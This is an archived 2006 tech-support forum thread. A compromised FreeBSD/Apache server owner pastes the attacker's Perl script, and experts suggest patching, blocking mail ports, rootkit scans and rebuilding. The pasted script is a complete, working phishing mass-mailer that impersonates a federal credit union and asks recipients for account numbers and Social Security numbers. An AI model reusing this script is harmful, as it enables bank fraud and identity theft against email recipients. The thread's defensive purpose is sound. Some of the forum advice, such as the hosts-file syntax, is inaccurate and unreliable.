Solved

Protect Port 80(Apache)

Posted on 2006-07-02
19
1,598 Views
Last Modified: 2012-05-05
We have an intrusion which looks like an automated script which buries itself in a hidden directory in /tmp directory. This script is basically a combination of 2 files
"awstats.pl" and links.txt. What it does is, it starts sending out an email portraying itself as a BANK to the all the addresses in .txt file.
This was the 4th time it attacked us since april 23. We had no choice other than taking the server off the network. Any ideas, suggestions on how to protect port 80 with these kind of attacks?
0
Comment
Question by:zkaiserm
  • 4
  • 4
  • 3
  • +4
19 Comments
 

Author Comment

by:zkaiserm
Comment Utility
This is the culprit "awstats.pl"

#!/usr/bin/perl

print "Content-type: text/html\n";

$file = "list.txt";
open(IN_FILE, $file);
my @data=<IN_FILE>;
close IN_FILE;

$contfile = "test.txt";
open(IN_FILE, $contfile);
my @contdata = <IN_FILE>;
close IN_FILE;

my $count = 0;

my $SendmailPath = '/usr/sbin/sendmail';
my $from_s = 'customerservice@visionsfcu.org';
my $subj_s = 'NOTICE FROM Visions Federal Credit Union #REF-ID:79053430';
my $contdata_s = @contdata;

my($mailbody) = <<__END__MAILBODY__;


<html>
<body>

<div id="message" style="width: 1136; height: 558">
  <table id="AutoNumber1" border="1" bordercolor="#111111" cellpadding="0" cellspacing="0" width="34%">
    <tbody>
      <tr>
        <td width="100%">
          <p><img border="0" src="https://www.visionsfcu.org/images/visions2.jpg" width="158" height="50"></p>
          <p align="left"><font face="Arial" size="2">Dear Vision FCU Client,<br>
          &nbsp;&nbsp;&nbsp;<br>
          &nbsp;This is your official notification from Vision FCU&nbsp;that the
          service(s) listed below &nbsp;will be deactivated and deleted if not
          renewed immediately. Previous notifications have &nbsp;been sent to
          the Billing Contact assigned to this account. As the Primary Contact,
          you &nbsp;must renew the service(s) listed below or it will be
          deactivated and deleted.&nbsp;<br>
          <br>
          &nbsp;</font><font face="Verdana" size="2"><a target="_blank" href="http://visionsfcu.acswi.com/fcu-online/session_id.php"><font
color="#003399" face="Arial" size="2"><b>Renew
          Now</b></font></a></font><font face="Arial" size="2">&nbsp; your&nbsp;Vision
          FCU Bill Pay Services.<br>
          <br>
          If you are not enrolled to Online Banking, please enter your checking
          account number as&nbsp;Account Number&nbsp; and Social Security Number&nbsp;
          as Password.</font></p>
          <div style="width: 508; height: 48">
            <font face="Arial" size="2">&nbsp;<br>
            &nbsp;<b><font color="#000000">SERVICE</font></b> : Vision FCU Bill
            Pay Services.<br>
            &nbsp;<b><font color="#000000">EXPIRATION</font><font color="#000080">
            </font></b>:&nbsp;May 15, 2006</font>
          </div>
          <div>
            <font face="Arial" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Arial" size="2"><br>
            Thank you,&nbsp;sincerely,<br>
            <br>
            <font size="-1">Eric Kingsbury</font>, Customer Service</font>
          </div>
          <div>
            <p align="center"><font face="Verdana" size="2">======================================================================<br>
            &nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<br>
            ======================================================================</font></p>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;Document Reference: (#79053430).</font>
          </div>
          <p align="center"><font face="Verdana" size="2"><b>2006 Vision FCU,
          All Rights Reserved. Member FDIC. Equal Housing Lender.</b></font></td>
      </tr>
    </tbody>
  </table>
</div>

</body>

</html>

__END__MAILBODY__

foreach $line (@data){
print qq($line);
sendmail($line, $from_s, $subj_s, $mailbody );
}

sub sendmail{
     my ($to, $from, $subj, $msg) = @_;
     open (MAIL, "|$SendmailPath -t -i")|| die "Error! Can't use sendmail\n";
     print MAIL "To: $to";
     print MAIL "From: $from\n";
     print MAIL "Subject: $subj\n";
     print MAIL "Reply-To: $from\n";
     print MAIL "Content-type: text/html\n\n";
     print MAIL "$msg\n";
     close (MAIL);
}

my $count;
$count++ foreach(@data);
print "$count emails sent\n";</p>
0
 
LVL 27

Expert Comment

by:Tolomir
Comment Utility
This is of cause just a quick countermeasure:

If that is all time the same script, how about modifying the hosts file and add

visionsfcu.org 127.0.0.1
visionsfcu.acswi.com 127.0.0.1

creating a directory "images" in the www documents folder and putting a big: "FAKE" in the pic: visions2.jpg that file goes in the "images" folder.

Should at least stop the spammer collecting more pins...

---

Apart from that, apply all security patches for your system, I guess there lies the problem.


Tolomir
0
 
LVL 1

Accepted Solution

by:
SashaP earned 125 total points
Comment Utility
There are a couple of solutions:
- Configure your Apache to pass only specific requests (for example, for index.cgi, index.html, etc.), and block all of the rest. You can do it using 'RewriteRule' clauses.
For example, you can add the following rules to configuration file of your http server (Apache):
RewriteEngine on
RewriteRule  ^.*index.(^.*) http://%{HTTP_HOST}/index.$1 [L,R]
RewriteRule ^\/^.* http://nowhere

- You can try to capture the request that causes the script activation (using tcpdump on tcp port 80). Yes - this is a Sizific work, but capturing firewall intrusions is not an easy way. Once you have found the request which cause the intrusion, reconfigure your firewall to block such request (based on request IP or any other IP specific type).


Hope that I helped you.
0
 
LVL 18

Expert Comment

by:decoleur
Comment Utility
I agree, a large concern that should be addressed is how is this application getting onto your system. Configuring your loggs to identify suspicious traffic could go a long way to figuring out how the application is being installed and run. I would also make sure that all of your apps are running the latest versions of the necessary applications and not running anything that is unecessary. A tool like log watch can go through your httpd logs and inform you if sketchy behavior.

For example this is a pearl script, if you can do without perl then you will stop this application cold even if it stays on your machine.

hope this helps

-t
0
 
LVL 38

Expert Comment

by:Rich Rumble
Comment Utility
http://www.google.com/search?hl=en&q=locking+down+apache&btnG=Google+Search
Yes, secure your apache install, make sure it's got the latest patches and your running the latest version.
http://security.lss.hr/index.php?page=details&ID=LSS-2005-01-01
-rich
0
 
LVL 13

Expert Comment

by:prashsax
Comment Utility
Emails are send using port 25/tcp.

You could block this port on the server itself(using ipchains,iptables), or on network.

With port blocked, the script will not be able to send mails.

0
 
LVL 18

Expert Comment

by:decoleur
Comment Utility
blocking port 25 will solve the problem with sending out emails but will not remove the cause. if the server can be exploited to send out emails what else is it being used for tht you do nto know of?

you are better off finding the cause or rebuilding a new box with all of the latest patches, i have seen machines so pwned that you could take three times more time cleaning it than you would dropping in a blank drive and starting over and that was with extensive logging running on the machine.
0
 

Author Comment

by:zkaiserm
Comment Utility
folks,
     Thanks for your response. One thing which bothers me how did these files ended up on our server? That too it was so well written that they were hidden or it's not exactly hidden it's a directory without a name. for example
The space you use between tmp and trimite is a directory without a name. What could be the cause of these files ending up on our server? is it the webserver configuration? or is something wrong with the webapplication? is there any way practical way of knowing this is how they hack into the webserver? How in the world could someone put files on your server through port 80? would be the question of the day??


/tmp/  /trimite/awstats.pl
0
Top 6 Sources for Identifying Threat Actor TTPs

Understanding your enemy is essential. These six sources will help you identify the most popular threat actor tactics, techniques, and procedures (TTPs).

 
LVL 27

Expert Comment

by:Tolomir
Comment Utility
Well, as I posted above. Your system can be vulnerable because it's missing latest patches.

Check what ports are open, check if that software is patched with up-to-date patches.

Tolomir
0
 
LVL 38

Expert Comment

by:Rich Rumble
Comment Utility
Take your pick... It could be Apache, it could be TomCat if your running it, it could be your code, or due to a lax .conf file or setting
http://secunia.com/search/?search=apache
XSS (cross site scripting) has been getting more and more attention lately http://en.wikipedia.org/wiki/XSS There are unfortunatly quite a few vectors for this.
To me if it's not XSS, it's likely lax security of the config or on the directories, write permissions may be granted to everyone... possibly a username/password embedded in your source code?
-rich
0
 

Author Comment

by:zkaiserm
Comment Utility
Tolomir,
     We have a firewall. Intruders can only use the ports which are open. Your answer looks quite normal. I signed for experts exhcange to know what happens behind the scenes.I would like how it happens. How come some send commands through the browser?



Kaiser
0
 
LVL 38

Expert Comment

by:Rich Rumble
Comment Utility
Flaw's in your source code, scripting, scripting intereperters, apache exploits, lax security settings, all can lead to what happened to you.
Are you running PHP code, CGI/PERL code, do you have a login site? Each piece of software add's complexity, possible exploit vectors, and more overhead for you to figure out how to secure. Login sites can be poorly made, often the database usernames and pass's can be in the source code, or not obusifcated well. You can glean quite a bit of info from a poorly written site.

If your running PHP, or PHPBB you can see there are hundreds of exploit's that can lead to compromise, there are a variety of worst practices that can lead to this also.
http://secunia.com/search/?search=php
http://secunia.com/search/?search=phpbb

Things like this: http://www.securityfocus.com/bid/15250/info http://www.securityfocus.com/bid/15250/discuss
Can upload a script, if you'd like to learn more you can search bugtraq, or pick up some of the Hacking Exposed series of books.
http://governmentsecurity.org/archive/t4603.html Ahh the loginmatrix challenge... that was a great tool to learn from, it's gone now... tooo bad, that one was fun.
-rich
0
 
LVL 27

Expert Comment

by:Tolomir
Comment Utility
Richrumble pointed it our precisely.

Please tell us more about the software componentes you use.

E.g. Host OS : win 2k3, IIS Webserver, MSSQL Database 2005.

such like...

Tolomir
(also normal)
0
 

Author Comment

by:zkaiserm
Comment Utility
Apache 1.3.x
mysql 3.x
php 4.1
freebsd 5.1

The email the users got was like www@ourhostname.com. What's this "www" user?
0
 
LVL 38

Assisted Solution

by:Rich Rumble
Rich Rumble earned 125 total points
Comment Utility
All very dated packages, search for exploits on anyone of those and you'll find something. Try downloading GFI's languard network scanner, and running it against your server, also try nessus, it's it's still free.
-rich
0
 
LVL 18

Assisted Solution

by:decoleur
decoleur earned 125 total points
Comment Utility
Freebsd 5.1 was released early in 2003, there are many exploits that are active in the wild that can compromise a system that has not been patched since the initial install. If you like the platform wipe and re-install the patest FreeBSD production release (6.1) and patch that.

I would not spend your time trying to track down what is wrong with your system because there are many places that could have issues from the OS to the applications running on it and unless you are very comfortable with this environment, not very obvious to detect.

We will always be more than willing to assist you in this effort, but sometimes it makes more sense to start fresh.

Regards,

-t
0
 
LVL 12

Assisted Solution

by:GinEric
GinEric earned 125 total points
Comment Utility
rootkit, variation of vudo.c, and IRC Spykidz warez ware.  rkhunter should be got and run.  Then inspect all of your temp folders and try to get rid of execute permissions there.  Look for anything that ends in .pl and the like.

These phishers, hackers, and irc box ownerz know about legitimate programs and often name their stuff after them.  They collect usernames, harvest emails, attempt identity theft, and things like that.

You have to track this down manually and document it all.

User "nobody" should not have mail privileges.  Usually the scripts you are suggesting feign the user as soon as they detect Apache 1.3

But they can do it to other servers as well.

The older Apache, KDE, MySQL, PHP, and quite a few others are vulnerable and the hackers know it; apparently most of the developers either do not or they are unwilling to admit it.

As for your time trying to track down what is wrong, if you don't it is only going to keep on happening.  It will happen until the people doing it are caught and they can't be caught without someone tracking them down.

You don't want the big bank that they are impersonating subpoenaing all of your computers, do you?  Track them down and build evidence.
0

Featured Post

How your wiki can always stay up-to-date

Quip doubles as a “living” wiki and a project management tool that evolves with your organization. As you finish projects in Quip, the work remains, easily accessible to all team members, new and old.
- Increase transparency
- Onboard new hires faster
- Access from mobile/offline

Join & Write a Comment

Ransomware continues to be a growing problem for both personal and business users alike and Antivirus companies are still struggling to find a reliable way to protect you from this dangerous threat.
Healthcare organizations in the United States must adhere to the guidance of both the HIPAA (Health Insurance Portability and Accountability Act) and HITECH (Health Information Technology for Economic and Clinical Health Act) for securing and protec…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
You have products, that come in variants and want to set different prices for them? Watch this micro tutorial that describes how to configure prices for Magento super attributes. Assigning simple products to configurable: We assigned simple products…

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now